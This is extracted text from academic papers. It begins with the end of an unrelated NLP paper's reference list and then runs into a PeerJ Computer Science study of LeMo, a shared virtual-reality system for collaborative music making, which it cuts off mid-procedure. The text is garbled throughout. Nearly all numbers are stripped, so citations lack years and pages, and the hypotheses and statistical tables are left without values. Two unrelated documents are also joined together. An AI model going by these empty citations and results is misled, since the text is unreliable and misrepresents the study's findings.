and oren etzioni. . paraphrase-driven learning for open question answering. in proceedings of the th annual meet- ing of the association for computational linguistics (acl), pages – . michel galley, mark hopkins, kevin knight, and daniel marcu. . what’s in a translation rule? in proceedings of the human language technol- ogy conference of the north american chapter of the association for computational linguistics (hlt- naacl), pages – . michel galley, jonathan graehl, kevin knight, daniel marcu, steve deneefe, wei wang, and ignacio thayer. . scalable inference and training of context-rich syntactic translation models. in proceed- ings of the th annual meeting of the association for computational linguistics (acl), pages – . juri ganitkevitch, chris callison-burch, courtney napoles, and benjamin van durme. . learning sentential paraphrases from bilingual parallel corpora for text-to-text generation. in proceedings of the conference on empirical methods in natural lan- guage processing (emnlp), pages – . asso- ciation for computational linguistics. juri ganitkevitch, benjamin van durme, and chris callison-burch. . ppdb: the paraphrase database. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language tech- nologies, pages – , atlanta, georgia, june. as- sociation for computational linguistics. ruifang ge and raymond j mooney. . learning a compositional semantic parser using an existing syn- tactic parser. in proceedings of the joint conference of the th annual meeting of the acl and the th international joint conference on natural language processing of the afnlp: volume -volume , pages – . peter gurský, tomás horváth, peter vojtás, jozef jirásek, stanislav krajci, robert novotny, jana pribolová, and veronika vaneková. . user preference web search – experiments with a system connecting web and user. computing and informatics, ( ): – . kenneth heafield, philipp koehn, and alon lavie. . grouping language model boundary words to speed k- best extraction from hypergraphs. in proceedings of the conference of the north american chapter of the association for computational linguistics: hu- man language technologies, pages – . kenneth heafield. . kenlm: faster and smaller lan- guage model queries. in proceedings of the con- ference on empirical methods in natural language processing (emnlp), pages – . philipp koehn. . statistical significance tests for machine translation evaluation. in proceedings of the conference on empirical methods in natural language processing (emnlp). tom kwiatkowski, eunsol choi, yoav artzi, and luke zettlemoyer. . scaling semantic parsers with on-the-fly ontology matching. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – . johannes leveling. . a comparative analysis: qa evaluation questions versus real-world queries. in pro- ceedings of the th international conference on lan- guage resources and evaluation (lrec). peng li, yang liu, and maosong sun. . an ex- tended ghkm algorithm for inducing lambda-scfg. in proceedings of the th association for advance- ment of artificial intelligence, pages – . percy liang, michael i. jordan, and dan klein. . learning dependency-based compositional semantics. in proceedings of the th annual meeting of the as- sociation for computational linguistics (acl), pages – . nitin madnani, necip fazil ayan, philip resnik, and bonnie dorr. . using paraphrases for parameter tuning in statistical machine translation. in proceed- ings of the workshop on statistical machine transla- tion (wmt ), prague, czech republic. kathleen r. mckeown. . paraphrasing questions using given and new information. computational lin- guistics, ( ): – . scott miller, robert bobrow, robert ingria, and richard schwartz. . hidden understanding models of natural language. in proceedings of the nd annual meeting of the association for computational linguis- tics (acl), pages – . graham neubig, taro watanabe, eiichiro sumita, shin- suke mori, and tatsuya kawahara. . an unsuper- vised model for joint phrase alignment and extraction. in proceedings of the th annual meeting of the as- sociation for computational linguistics: human lan- guage technologies (hlt-acl), pages – . graham neubig, philip arthur, and kevin duh. . multi-target machine translation with multi- synchronous context-free grammars. in meeting of the north american chapter of the association for com- putational linguistics (naacl), denver, usa, may. graham neubig. . travatar: a forest-to-string ma- chine translation engine based on tree transducers. in acl (conference system demonstrations), pages – . franz josef och and hermann ney. . a system- atic comparison of various statistical alignment mod- els. computational linguistics, ( ): – . hoifung poon and pedro domingos. . unsuper- vised semantic parsing. in proceedings of the conference on empirical methods in natural lan- guage processing (emnlp), pages – . hassan sajjad, patrick pantel, and michael gamon. . underspecified query refinement via natural language question generation. in proceedings of the th international conference on computational lin- guistics (coling), pages – . milad shokouhi, rosie jones, umut ozertem, karthik raghunathan, and fernando diaz. . mobile query reformulations. in proceedings of the th in- ternational acm sigir conference on research & development in information retrieval, pages – . chenguang wang, nan duan, ming zhou, and ming zhang. . paraphrasing adaptation for web search ranking. in proceedings of the th annual meeting of the association for computational linguistics (acl), pages – . yuk wah wong and raymond j mooney. . learn- ing for semantic parsing with statistical machine trans- lation. in proceedings of the human language technology conference of the north american chap- ter of the association for computational linguistics (hlt-naacl), pages – . yuk wah wong and raymond j mooney. . learn- ing synchronous grammars for semantic parsing with lambda calculus. in proceedings of the th annual meeting of the association for computational linguis- tics (acl), number , pages – . xiaobing xue and w. bruce croft. . modeling re- formulation using query distributions. acm transac- tion on information systems, ( ): : – : . john m. zelle and raymond j. mooney. . learn- ing to parse database queries using inductive logic pro- gramming. in proceedings of the th national con- ference on artificial intelligence, pages – . luke s zettlemoyer and michael collins. . learn- ing to map sentences to logical form: structured clas- sification with probabilistic categorial grammars. un- certainty in artificial intelligence (uai), pages – . luke s zettlemoyer and michael collins. . on- line learning of relaxed ccg grammars for parsing to logical form. in proceedings of the joint confer- ence on empirical methods in natural language pro- cessing and computational natural language learn- ing (emnlp-conll), pages – . submitted june accepted september published november corresponding author liang men, l.men@qmul.ac.uk academic editor john carroll additional information and declarations can be found on page doi . /peerj-cs. copyright men et al. distributed under creative commons cc-by . open access designing spaces to support collaborative creativity in shared virtual environments liang men, nick bryan-kinns and louise bryce school of electronic engineering and computer science, queen mary university of london, london, united kingdom abstract shared virtual environments (sves) have been researched extensively within the fields of education, entertainment, work, and training, yet there has been limited research on the creative and collaborative aspects of interactivity in sves. the important role that creativity and collaboration play in human society raises the question of the way that virtual working spaces might be designed to support collaborative creativity in sves. in this paper, we outline an sve named lemo, which allows two people to collaboratively create a short loop of music together. then we present a study of lemo, in which users composed music in pairs using four different virtual working space configurations. key findings indicated by results include: (i) providing personal space is an effective way to support collaborative creativity in sves, (ii) personal spaces with a fluid light-weight boundary could provide enough support, worked better and was preferable to ones with rigid boundaries and (iii) a configuration that provides a movable personal space was preferred to one that provided no mobility. following these findings, five corresponding design implications for shared virtual environments focusing on supporting collaborative creativity are given and conclusions are made. subjects human-computer interaction, social computing keywords collaborative cretivity, virtual reality, shared virtual environment, collaborative music making, sonic interaction design, gesture design, hci introduction the real world envelops us with space that we share with others; in this surrounding environment, we perceive rich sensory information about objects and events happening around us. using this information, we interact with this outer world around us via inference, manipulation, and exploration. in a similar fashion we interact with other people. in other words, space can be seen as a material of human activity (raffestin, ), and it has a great influence on social activity, e.g., the size of space limits what kind of actions can be performed, the fill material of a space limits how far people can see or hear, and the proxemics between bodies and objects in a space limits their scope of influence. digital virtual spaces have existed in different forms for several decades. one of the earliest examples are digital games, e.g., star trek created in early s provides a computational space that players can visit and experience through text descriptions on a computer screen, see (case, ploog & fantino, ). though these non-immersive media can involve people to a very high level and generate the experience of flow, few of them have enabled people to interact in a natural way that is similar to the way that people how to cite this article men l, bryan-kinns n, bryce l. . designing spaces to support collaborative creativity in shared virtual envi- ronments. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:l.men@qmul.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. experience real-world interactions. for instance, the interactions based on keyboards and mouse for input and monitor for output have very different properties to real-world interactions (gaver, ). in contrast, virtual reality (vr) provides a novel space for multisensory experiences (turchet et al., ), and enables people to see, hear, and even interact with a virtual space naturally. it offers the potential for people to coordinate collaborative activities in a much more similar way to the real world, presenting people an opportunity to collaborate in virtual space in a more natural way in comparison to non-immersive digital media. whilst vr has become a hot topic and has been researched intensively, little attention has been paid to human-human interactions in shared virtual environments (sves), with even less being paid to addressing the creative and collaborative aspects of these interactions. we believe that having a better understanding of the role of space and territory within creative collaborations would provide a strong starting point, since real-world collaborations make use of space (raffestin, ) and the demarcation of personal and shared territory is a spatial strategy to affect, influence and control resources and access (sack, ). hence an effective arrangement and utilisation of a working space can possibly be a crucial factor to a successful collaboration in sves too. thus we are keen on designing and testing working space configurations to see if we can provide more fluid support to creative collaboration in sves. we will begin by reviewing related work in sves, space, territory, and territoriality. then the design of our sve system will be detailed and the study and results will be presented. finally, the overall study will be discussed and design implications will be given. related work shared virtual environments the term virtual environment (ve) can be traced back to the early s (bishop & fuchs, ), it emerged as a competing term to virtual reality; however, both are usually equally used to refer to a world created totally by computer simulation (luciani, ). in the mid- s, the development of network technology had made it feasible to link many users simultaneously in the same virtual environment, prompting the shared virtual environments (sves; schroeder, ). besides ‘‘sves’’, other terms used include multi-user virtual environments, multi-user virtual reality (carlsson & hagsand, ), collaborative virtual environments (cves; zhang & furnas ) and social virtual reality (svr). to align with mainstream usage, we will herein use the term sves to refer to ve systems in which users experience other participants as being mutually present in the same environment and in which they can interact inter-personally (cf. schroeder, ). sves can be seen as a convergence of research interests in vr and computing supported cooperative work (cscw; benford et al. ). whilst single-person ves may focus on creating a detailed (visual) simulation, the design of sves typically prioritises enabling collaboration between users (nassiri, powell & moore, ). by enabling multiple people to communicate and interact with each other and providing a natural medium for three-dimensional cscw (billinghurst et al., ), sves are considered emerging tools for a variety of purposes, including men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. toybox demo for oculus touch: https://www.youtube.com/watch?v= ifemiygma (accessed: - - ). a playstation vr demo: https://www. theverge.com/ / / / / playstation-virtual-reality-social-vr-demo (accessed: - - ). community activities (lea, honda & matsuda, ), online education (roussos et al., ), distributed work and training (nedel et al., ), and gaming and entertainment (see toybox and a playstation vr demo ) despite this, little research exist in the field of supporting collaborative creativity, leaving an open question: how should shared virtual environments be designed to support creative collaboration (cf. basdogan et al., ). space, territory, and territoriality sves constitute virtual spaces, although illusive they are meaningful (steuer, ). we believe gaining a better understanding of the virtual space is an effective way to answer the aforementioned question. ‘‘space’’ is a material given prior to the happening of actions, and territory emerges as a result of the actions and a production of the actors (raffestin, ), helping people mediate their social interaction (altman, ), which is argued to be a key element to collaboration (kreijns, kirschner & jochems, ). additionally, people were found to perform creative collaboration in a similar way with the real world, they divided the working space and formed territory (men et al., ; men & bryan-kinns, ). thus, potentially, with more knowledge of the virtual space, we can even manipulate the virtual space to influence the collaboration in sves. note in this paper, the term ‘‘space’’ specifically refers to the physical virtual space rather than the space concept in psychology or social science, which falls out of the scope of this paper. personal and group space in collaboration a ‘‘personal space’’ herein refers to a specific space assigned to a specific person and ‘‘group space’’ refers to a specific space assigned to a specific group prior to the start of activities (e.g., an experiment). in cscws that focus on supporting collaborative creativity, providing personal space is argued to be useful (fencott & bryan-kinns, ; men & bryan-kinns, ), and integrating personal and group spaces, allowing users to work individually in their personal spaces at their own pace, cooperatively work together in the shared space, and smoothly transition between both is important (greenberg, boyle & laberge, ; sugimoto, hosoi & hashizume, ). as a starting point of this exploration, greenberg, boyle & laberge ( ) developed a pda-based prototype named sharednotes. they observed how users shifted between the two spaces and recommended against a rigid notion of ‘‘personal’’, instead they suggested the boundary between personal and public should be provided with gradations in subtle and lightweight ways, supporting a fluid transition between personal and public. following that, shen, everitt & ryall ( ) addressed this concern in their project ubitable by providing a flexible gradient of sharing semantics. specifically, rather than the binary notion of public and private space, ubitable provides an additional semi-private space, in which data is visible but not electronically accessible for others. however, both sets of research were carried out based on d media (pda and projector respectively), which made their findings less informative for vr. moreover, neither of these two explored more gradations between public space and personal space, i.e., the transition between the public space and personal space is step-less and smoother. in this study, we want to design virtual spatial configurations that provide a more gradual boundary between personal and public spaces and see if this can enable a fluid shift and provide better support for collaboration in vr. men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.youtube.com/watch?v=ifemiygma https://www.youtube.com/watch?v=ifemiygma https://www.theverge.com/ / / / /playstation-virtual-reality-social-vr-demo https://www.theverge.com/ / / / /playstation-virtual-reality-social-vr-demo https://www.theverge.com/ / / / /playstation-virtual-reality-social-vr-demo https://peerj.com http://dx.doi.org/ . /peerj-cs. territory and territoriality in collaboration (sves and tabletop) in a previous study, we found collaborators formed both personal and group territory during collaborative music making in an sve, and they also had territorial behaviour, e.g., most musical edits were done inside personal territories (men & bryan-kinns, ). by manipulating the virtual spatial configurations of an sve, the formation of territory and territorial behaviour can be influenced and, and as a result, the collaboration can be influenced (men & bryan-kinns, ). because there is limited research on territoriality in vr, and rich research on this in tabletop-based collaboration, we review territoriality in tabletop research as a supplement, which might be informative as it is also a computer- mediated collaboration that evolves territory. the term ‘‘tabletop’’ here refers to interactive tabletop displays, these usually include high quality projectors, flat panel or plasma displays, and touch-sensitive surfaces (kruger et al., ). these electronic tabletops inherit the collaborative benefits of tables, which greatly compensate computers’ disadvantages in this regard (scott, carpendale & inkpen, ). similarly, territoriality also plays an important role in the tabletop collaboration. collaborators were found to use different types of territory to serve different needs, including sharing, exchanging or storing working tools and resources (scott, carpendale & inkpen, ), though some researchers note that removing territorial constraints can promote exploratory group activity (xambó et al., ). two main types of territory have been identified from research on screen and tabletop mediated collaboration: ( ) personal territory for performing independent activities. when provided with a personal territory, users prefer to test their contribution before introducing it to the group work (fencott & bryan-kinns, ). this type of territory serves as a safe place to try and develop alternate ideas before publishing the ideas (tang, ). users have been found to prefer to rotate items toward themselves in the personal territory (tang, ) and perform very few actions in their collaborators’ personal territories (scott, carpendale & inkpen, ). ( ) group territory for performing the main task. in group territory, people create and develop new solutions, transfer resources and provide help (scott, carpendale & inkpen, ). it is interesting to note that the orientation properties of objects in the group territory can be used to convey support, to separate ideas or to group products (tang, ). in terms of designing for territoriality, scott, carpendale & inkpen ( ) proposed four guidelines for designing digital tabletop workspaces: (i) visibility of action; (ii) an appropriate size of workspace; (iii) providing functionality in the appropriate locality; (iv) allowing for the grouping of items to facilitate storage. furthermore, the visibility and transparency of actions have been found to be important in designing group workspaces, as they help collaborators to monitor each others’ actions, maintaining workspace awareness during collaboration (pinelle, gutwin & greenberg, ; fencott & bryan-kinns, ). however, this can result in overloaded cognitive information, which some people found to be difficult to handle (fencott & bryan-kinns, ). to date, little research has explored how such features of workspace might be designed for collaboration in sves. men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. full source available at: https://sites.google. com/view/liangmen/projects/lemo experiment design creativity domain: why collaborative music making music making, as a collaborative activity that relies on shared goals, understanding and good interpersonal communication, has long been a key form of collaborative creativity (cf. bryan-kinns & hamilton, ; titon & slobin, ). its unique features make it an excellent activity through which to study collaborative activity. in , blaine & fels explored the design criteria of collaborative music-making (cmm) systems and pointed out key features including the media used, player interaction, the systems’ learning curves, physical interfaces and so on. in the same year, with inspiration from rodden’s ( ) classification space for collaborative software, otherwise known as groupware, barbosa ( ) developed the networked music systems classification space, which classifies cmm systems (cmms) in terms of the time dimension (synchronous/asynchronous) and space dimension (remote/co-located). for instance, daisyphone (bryan-kinns, ), which provides shared editing of short musical loops falls into the remote synchronous network music systems in this classification space. other examples include reactable (xambó et al., ) and billiart (bressan, vets & leman, ), both of which provide co-located music- making experience, and ocarina (wang, ), which provides a distributed experience. however, we should note that, despite decades of research into cmms and sves, relatively few sves that support cmm have been made. as a result, many basic but crucial questions in this field are waiting to be answered, e.g., how shared virtual environments should be designed to support creative collaboration, such as cmm. acoustic attenuation sound attenuates as a result of diminishing intensity when travelling through a medium. this feature of sounds enables humans to use their innate spatial abilities to retrieve and localise information and to aid performance (cf. billinghurst & kato ). whilst it is hard to adjust the acoustic attenuation of a real medium (e.g., the air) to enhance its potential, within vr, as the audio is simulated, we can simulate an augmented spatialised sound purposely. research has been done on investigating the impacts of spatialised sounds on user experience in vr, e.g., (hendrix & barfield, ). however, little research explores how the spatialisation of sound may affect or aid collaboration in sves (e.g., cmm). considering sound is both the primary medium and the final output of the creative task cmm (men & bryan-kinns, ), by affecting the audio, different settings of acoustic attenuation can possibly affect the collaboration differently. with the ability to modify the simulated acoustic attenuation in an immersive virtual environment, we can possibly create sonic privacy by augmenting acoustic attenuation, this privacy may then be used as personal space supporting individual creativity in cmm. lemo—an sve for collaborative music making we created let’s move (lemo ), which enables two users to manipulate virtual music interfaces together in an sve to create a -beat music loop, see fig. . lemo used in this study and men & bryan-kinns ( ) is an extensively modified version of the previous version (men & bryan-kinns, ). major differences include a new visual men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://sites.google.com/view/liangmen/projects/lemo https://sites.google.com/view/liangmen/projects/lemo https://peerj.com http://dx.doi.org/ . /peerj-cs. figure participant a and b are creating music together. full-size doi: . /peerjcs. /fig- presentation of the interface, the ability to add, delete, and re-position music loops, with more freedom in terms of instruments, tempo, volume and pitch. these changes are made to improve the experience of music making and, more importantly, to enable users to re-position and share music loops, which is essential for this study. hereafter, ‘‘lemo’’ specifically refers to this modified version. lemo was programmed in unity, models and textures were made in cinema d and photoshop respectively. the run-time environment includes two htc vive headsets (each with a leap motion mounted, see fig. c). the position and rotation of headsets are tracked by two tracking cameras set men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure (a) the gesture to generate a new interface; (b) matrix (opened interface) and sphere (packed interface), double click the pop button to switch in between (reproduced from men & bryan-kinns ). full-size doi: . /peerjcs. /fig- around the scene, and hand gestures are tracked by the mounted leap motion. two pcs are used to run lemo, these are connected and synchronised via a lan cable. lemo has three key elements: ( ) music interface—lemo allows users to generate, remove, position and edit virtual music interfaces, which have two modes: sphere and matrix (fig. b). users can generate up to eight spheres with pinch and stretch gesture, see fig. a. the music interface can be switched between the two modes, re-positioned or removed by manipulating the sphere or the pop button of the matrix with corresponding gestures. as shown in fig. , the matrix interface contains a grid of × dots, with controllers at the bottom. each row represents the same pitch, forming an octave from bottom to top. users can edit notes by tapping dots. a vertical play-line repeatedly moves from left to right playing corresponding notes. in this way, each interface generates a -note music loop. three controllers (tempo, volume and pitch) and two functional buttons (erase and switch) are located at the bottom of the matrix interface. ( ) avatars—each user has an avatar, including a head and both hands (fig. ). avatars are synchronised with users’ real movements in real time, including position and rotation of heads, as well as gestures. lemo provides visual aids for collaboration by synchronising the virtual environment (virtual space and music interfaces) and avatars across a network, providing participants with the sense of being in the same virtual environment and manipulating the same set of interfaces. ( ) a virtual space that includes a grey stage with a grid pattern (part of it is shown in fig. d). four types of spatial configurations were designed for this study, which will be detailed later. beside these three fundamental elements, lemo also has: spatialised audio (volume drops with distance) so that users can hear where the sounds originate; a voice notification system to facilitate the experiments, e.g., in experimental scenario users will hear ‘‘ min left’’ and ‘‘end of session’’ notifications; a data-log system based on trackers (htc vives and leap motion) to log time-stamped data from events generated by users’ interactions and movements, including positions and rotations of heads, index fingers, thumb fingers, the manipulation with musical interface (addition/deletion/re-positioning men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. tempo volume erase pop switch pitch same row for same notes, different row for different notes, rows cover the one-line octave a virtual playline checks columns left to right, and plays notes if dots activat- ed c b a g f e d c note figure a c major scale, starting from c and finishing at c , and going back to c . full-size doi: . /peerjcs. /fig- of musical interfaces, addition and deletion of music notes), usage of personal space (activation/deactivation of personal spaces). hypotheses research has suggested that users should be allowed to work individually in their personal spaces at their own pace, cooperatively work together in the shared space, and smoothly transition between both of the spaces during collaboration (greenberg, boyle & laberge, ; shen, everitt & ryall, ; sugimoto, hosoi & hashizume, ). in a previous study (men & bryan-kinns, ), following this implication, we built three different spatial configurations (public space only, public space + publicly visible personal space, public space + publicly invisible personal space), and tested different impacts of these spatial configurations on collaborative music making in an sve. the results showed adding personal space to be helpful in supporting collaborative music making in sve, since it provided a chance to explore individual ideas, and provided higher efficiency. however, several negative impacts also showed up along with the addition of personal space, e.g., longer average distance between participants, reduced group territory and group edits (men & bryan-kinns, ). we believe this might due to: (i) the separated stationary locations of the personal spaces, forced collaborators to leave each other to access, and resulted in a longer distance between collaborators and less collaboration; (ii) the rigid boundary between public space and personal space made users more isolated, resulting in a higher sense of isolation. thus, we are keen on designing new types of personal territory to eliminate these disadvantages, and to provide a more flexible, more fluid collaboration experience. to increase the flexibility, we want to enable users to use personal space anywhere on the stage in the sve, and see how this flexibility might positively affect the collaboration, thus h was developed. to make the shift between personal and public spaces more fluid, inspired by the implication that the separation between public and personal workspace should be men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. gradual rather than too rigid (greenberg, boyle & laberge, ), we think the attenuation feature can be applied to form a gradual personal space and enable a fluid transition between personal space and public space. this is because the sound is both the primary medium of collaborative tasks and the final work of cmm (men & bryan-kinns, ), by manipulating acoustic attenuation, we can produce sonic privacy. for example, different levels of attenuation can lead to different levels of sonic privacy, and a high level of sonic privacy may play a similar role of personal space, thus h was developed. additionally, the acoustic attenuation, rather than a personal space with rigid separation from public space, enables a gradual shift between personal and public workspace, which may possibly increase the fluidity of the experience and support collaboration better (cf. greenberg, boyle & laberge ). thus we developed h . below are the three hypotheses: h —personal space with mobility provides better support for collaboration than personal space with no mobility. h —attenuation can play a similar role to personal space with rigid form (cf. men & bryan-kinns ) in cmm in sve, providing collaborators with a personal space and supporting individual creativity during the collaboration. h —acoustic attenuation provides a fluid transition (no hard borders nor rigid forms) between personal and public spaces, which supports collaboration better compared to conditions with rigid borders. independent variable spatial configuration is the independent variable in this experiment. as shown in fig. , four space configurations were designed as the independent variable levels to investigate these three hypotheses, including: condition : public space only (referred to as cpub): where players can generate, remove or manipulate music interfaces, and have equal access to all of the space and the music interfaces. as no personal space is provided, a shift between public and personal space does not exist, and users cannot shift to personal space. condition : public space + augmented attenuation personal space (referred to as caug). in addition to cpub, the acoustic attenuation is augmented. the volume of audio drops much faster, creating a sonic privacy, which can be seen as a personal space. as the volume changes gradually with the changes in distance, the shift between personal space and public space is gradual. condition : public space + fixed personal space (referred to as cfix). in addition to cpub, each user is now provided with a personal space located at the corner of the stage (see fig. ), which works like a acoustically solid (soundproof) boundary between public space and personal space. in other words, the shift between personal space and public space is now rigid. each user has a handle to activate/deactivate the personal space, the handle appears automatically over their head when they look up. condition : public space + moveable personal space (referred to as cmov). every feature of this condition is the same as cfix, except now the personal space appears centring the user’s current head’s position when being triggered. men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure components of the virtual experiment scene. note: the rigidly soundproof personal space and the handle switch were only available in cfix & cmov (a); tilted view of the four experimental condi- tion settings (b, c, d, e). full-size doi: . /peerjcs. /fig- note: to make conditions more realistic and less artificial, the acoustic attenuation in cpub, cfix, cmov are set to mimic the real acoustic attenuation in the real world rather than no attenuation at all. dependent variables to identify how users use the space and the effect of adding personal space with different properties, a series of dependent variables were developed, which can be split into participant reports and activity assessment. participant reports questionnaires were used to collect participants’ subjective assessment of the conditions and their experience of the collaboration. the igroup presence questionnaire (ipq) was used to inform the design of questions about the sense of the collaborator’s presence (schubert, friedmann & regenbrecht, ). questions about output quality, communication, and contribution were adapted from the mutual engagement questionnaire (meq; bryan- kinns, ). the rest of the questions were designed to question people’s preference for conditions. the questionnaire included questions on: men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. the queen mary research ethics committee granted ethical approval to carry out the study within its facilities (ethical application ref: qmrec ). ( ) presence: (i) sense of co-worker’s presence and (ii) sense of collaborator’s activities. note that the measure ‘‘sense of self-presence’’ is not included in this study, because a previous study (men & bryan-kinns, ) has shown lemo’s capability on producing a high-level of self-presence. ( ) communication: quality of communication, which may vary as the visibility of spaces can possibly affect the embodiment and nonverbal communication. ( ) content assessment: the satisfaction of the final music created reflects the quality of collaboration, cf. (bryan-kinns, ; bryan-kinns & hamilton, ). ( ) preference: preference of the conditions, checking if users have subjective preferences towards the settings. ( ) contribution: (i) the feeling of self’s contribution; (ii) the feeling of others’ contribution. these measures were set to see the effects of spatial configurations on the sense of contribution. these measures will be grouped into a post-session questionnaire (psq, see its items in table ), to be filled after participants experiencing each condition, and a comparison questionnaire (cq, see its items in table ), to be filled at the end of the experiment. activity assessments to access the characteristics of collaboration, we developed the following measures of activity in the collaboration based on the system-logged data: ( ) contribution: (i) number of musical note edits; (ii) number of note additions/dele- tions; (iii) number of mutual note modifications. here a mutual note modification indicate an edit on a certain note, the last update of which was performed by the collaborator, cf. (bryan-kinns, healey & leach, ). ( ) time and amount of use of personal space (only in condition cfix and caug, as this measure is based on the time-stamped entries of the rigid boundary of personal spaces): (i) number of uses of, (ii) length of time of using, and (iii) average duration of each use of personal space. ( ) location and territory: (i) distribution of participants’ locations and interactions; (ii) the sizes of personal/group territory; (iii) note edits fallen in different types of territory; (iv) average distance between participants, cf. colocation in (bryan-kinns, ). ( ) attention: (i) time participants spent paying close/ordinary attention to collaborator; (ii) number of times paying close/ordinary attention to the collaborator. strictly speaking, here ‘‘paying attention’’ means ‘‘facing toward the collaborator‘s avatar’’ as no eye tracker was involved in this study. participants and procedure fifty-two participants ( pairs) were recruited for this study via emails sent to group lists within the authors’ school. all participants were aged between and , with an average age of . (sd = . ). participants’ mean rating of personal musical theory knowledge is . (sd = . ) on a -point likert scale, where higher values indicate increased knowledge. twenty four ( . %) played one or more instruments, and the remaining ( . %) did not. participants’ rating of experience of collaboratively composing music is . (sd = . ) on a -point likert scale, where higher values indicate men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table results of post-session questionnairea and results of wilcoxon rank sum test (two-tailed)b. questions cpub caug cfix cmov cpub vs caug cpub vs cfix cpub vs cmov caug vs cfix caug vs cmov cfix vs cmov m (sd) m (sd) m (sd) m (sd) p (w) p (w) p (w) p (w) p (w) p (w) psq (support for creativity)—i think the spatial configuration in this session was extremely helpful for creativity . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( . ) . ( ) . ( ) . ( ) . ( ) psq (support for creativity)—i feel like the spatial configuration in this session was extremely helpful to support the development of my own ideas . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( ) . ( . ) . ( ) psq (preference)—i enjoyed the spatial configuration of this virtual world very much . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) psq (sense of collaborator’s presence)—i always had a strong feeling that my collaborator was there, collaborating with me together, all the time . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( . ) . ( ) . ( ) . ( ) psq (content assessment)—how satisfied are you with the final piece of loop music you two created in this session . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( ) psq (communication quality)—how would you rate the quality of communication between you and your collaborator during the session . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( ) . ( ) . ( ) psq (sense of collaborator’s activity)—i had a clear sense of what my collaborator was doing . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( ) psq (amount of contribution)—the amount of your contribution to the joint piece of music is . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( . ) . ( ) . ( . ) . ( ) . ( ) psq (amount of contribution)—the amount of your collaborator’s contribution to the joint piece of music is . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( . ) . ( . ) . ( ) . ( . ) psq (quality of contribution)—what do you think of the quality of your contribution to the joint piece of music is . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( ) . ( . ) . ( ) . ( . ) psq (quality of contribution)—what do you think of the quality of your collaborator’s contribution to the joint piece of music is . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( . ) notes. awith -point-likert scale, indicates no fulfilment at all with the description of the questionnaire and indicates a full fulfilment. bnote statistics in this table are calculated based on the data collected from the third and fourth session to counterbalance the learning effect. m en etal. ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table results of binomial test of comparison questionnaire (cq)a. question description option cpub caug cfix cmov k p k p k p k p cq (preference)—in which session, you enjoyed the spatial configuration the most? most enjoyed . . . . least enjoyed . . . . cq (content assessment)—in which session, you made the music you were most satisfied with? most satisfied . . . . least satisfied . . . . cq (coordination)—which session you found most difficult to track collaborator’s activities? most difficult . . . . least difficult . . . . cq (sense of collaborator’s presence)—which session did you have the strongest sense that your collaborator was there working with you together strongest . e− . . e− . least strongest . . . e− . cq (communication quality)—which session did you have the best quality of communication between your self and your collaborator best quality . . . . worst quality . . . . cq (preference)—which session had the best setting for creating a good piece of music collaboratively best setting . . . . worst setting . . . . cq (coordination)—which session did you find most difficult to cooperate with collaborator most difficult . . . . least difficult . . . . cq (contribution)—which session do you you feel you made the most contribution to the joint piece most contribution . . . . least contribution . . . . cq (contribution)—which session do you you feel your collaborator made the most contribution to the joint piece most contribution . . . . least contribution . . . . notes. alower-tailed test when k < , two-tailed test when k = , upper-tailed test when k > . increased experience. regarding familiarity with computers, ( . %) participants rated themselves as computer ‘‘experts’’, ( . %) chose ‘‘intermidiate’’, and only participant ( . %) chose ‘‘beginner’’. twenty participants ( . %) had tried vr – times before, ( . %) had only tried once, the remaining ( . %) had no vr experience before. thirty-seven participants knew their collaborators very well prior to the experiment, met their collaborators several times, but did not know well, the remaining did not know their collaborators at all prior to the experiment. the experimental hardware setup was exactly the same with lemo standard setup, see more details in the previous section ‘‘lemo—an sve for collaborative music making’’. after reading information forms and signing consent forms, each pair of participants first received an explanation of the music interface of lemo (see fig. ). then one men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. experimenter demonstrated all of the interaction gestures supported in lemo. by linking the demonstration with the first-person view shown on monitors, participants had a chance to learn how to play lemo. then, participants had a trial ( – min) to try all the ways of interaction. the trial ended once they were confident enough of all available gestures. the length of time of the tutorial session was flexible to ensure participants with diverse musical knowledge could grasp lemo. participants were then asked to have four sessions of collaboratively composing music that was mutually satisfying 